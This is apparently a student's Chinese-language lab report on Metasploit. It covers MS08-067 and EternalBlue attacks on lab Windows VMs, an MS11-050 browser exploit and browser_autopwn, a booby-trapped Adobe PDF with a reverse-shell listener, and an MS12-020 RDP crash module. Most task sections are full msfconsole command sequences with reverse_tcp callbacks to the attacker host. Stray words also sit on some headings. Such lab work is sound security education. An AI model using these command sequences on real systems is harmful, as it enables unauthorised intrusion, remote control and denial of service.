1、實驗內容說明及基礎問題回答html
2、實驗過程shell
3、問題與思考windows
4、實驗總結api
一、實驗內容
本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
(1) 一個主動攻擊實踐,如ms08_067; (1分)瀏覽器
(2)一個針對瀏覽器的攻擊,如ms11_050;(1分)安全
(3) 一個針對客戶端的攻擊,如Adobe;(1分)服務器
(4)成功應用任何一個輔助模塊。(0.5分)tcp
二、基礎問題回答
(1)用本身的話解釋什麼是 exploit , payload , encode.編碼
返回目錄3d
攻擊機kali——172.30.2.47
靶機:①WinXP——172.30.6.172②win2000——172.30.5.55
Task1 主動攻擊實踐
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連 msf exploit(ms08_067_netapi) > set LHOST 172.30.2.47 //攻擊機ip msf exploit(ms08_067_netapi) > set LPORT 5226//攻擊端口 msf exploit(ms08_067_netapi) > set RHOST 172.30.6.172 //靶機ip,特定漏洞端口已經固定 msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高 msf exploit(ms08_067_netapi) > exploit //攻擊
結果出現沒法建立會話界面
查看targets,與本機做對比
經過網上查找資料,發現xp中文版本打過補丁,因而換了一臺win2000的,攻擊成功
輸入ipconfig/all
,獲取相關的MAC地址、IP地址、子網掩碼、網關地址以及DNS
ms17_010
攻擊:kali
靶機:①win2000②winxp③win2008
search ms17-010 #搜索漏洞 use exploit/windows/smb/ms17_010_eternalblue #選擇漏洞 show payloads #查看可用攻擊載荷 set payload windows/x64/meterpreter/reverse_tcp #選擇攻擊載荷 options
set RHOST 172.30.2.111 #設置攻擊ip set LHOST 172.30.2.47 #設置監聽主機 set LPORT 5226 #設置監聽端口
失敗
嘗試更換虛擬機,終於,成功
Task2 針對瀏覽器的攻擊
攻擊機kali——172.30.2.47
靶機:①Win2000②win2007
ms11_050
msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用瀏覽器ms11_050漏洞 msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連 msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.2.47 //攻擊機ip msf exploit(ms11_050_cobjectelement) > set LPORT 5226 //攻擊端口固定 msf exploit(ms11_050_cobjectelement) > set URIPATH 5226lxs //統一資源標識符路徑設置 msf exploit(ms11_050_cobjectelement) > exploit
在瀏覽器輸入http://172.30.2.47:8080/5226lxs
,IE沒法訪問
設置瀏覽器的安全級別以下
在設置Internet選項後還是會出現IE瀏覽器的錯誤
browser_autopwn
實施browser_autopwn模塊
use auxiliary/server/browser_autopwn2 set SRVHOST 172.30.2.47 set URIPATH auto show options
開始攻擊,能夠看到msf在不停的嘗試不一樣的payload
嘗試成功,輸出了可被訪問的URLhttp://172.30.2.47:8080/auto
並啓動服務器
失敗again
Task3 對客戶端的攻擊,如Adobe
msf > use windows/fileformat/adobe_cooltype_sing msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連 msf exploit(adobe_cooltype_sing) > set LHOST 172.30.2.47 //攻擊機ip msf exploit(adobe_cooltype_sing) > set LPORT 5226//攻擊端口 msf exploit(adobe_cooltype_sing) > set FILENAME 20165226.pdf //設置生成pdf文件的名字 msf exploit(adobe_cooltype_sing) > exploit //攻擊
將生成的pdf文件拷貝到靶機上
back
退出當前模塊,進入監聽模塊,輸入如下命令:msf > use exploit/multi/handler //進入監聽模塊 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接 msf exploit(handler) > set LHOST 172.30.2.47 //攻擊機ip msf exploit(handler) > set LPORT 5226 //攻擊端口固定 msf exploit(handler) > exploit
在靶機上打開20165226.pdf文件
攻擊機顯示攻擊成功
靶機關閉PDF文件則失去權限
Task4 成功應用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模塊(惟一)
攻擊:kali
靶機:win2008
show auxiliary
查看全部的輔助模塊MS12-020(CVE-2012-0002)藍屏攻擊
msfconsole
search ms12-020 #搜索漏洞 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #使用漏洞 options #查看配置信息 set RHOST 172.30.2.47 #設置攻擊IP exploit #開始攻擊
問題1:在進行ms08_067_netapi
攻擊時出現如下狀況
首先查看targets
換另外一臺虛擬機,再次運行,攻擊成功
本次實驗學會了如何搜索漏洞,並在現有的漏洞環境下,嘗試利用漏洞進行直接或間接主動攻擊客戶端。在整個過程當中,其實找適合的虛擬機特別關鍵,整個過程耗費的時間大量集中在嘗試不一樣虛擬機使其得以被攻擊。不乏看出,打過補丁的虛擬機其抗攻擊能力更強,這也提醒咱們應時常更新配置。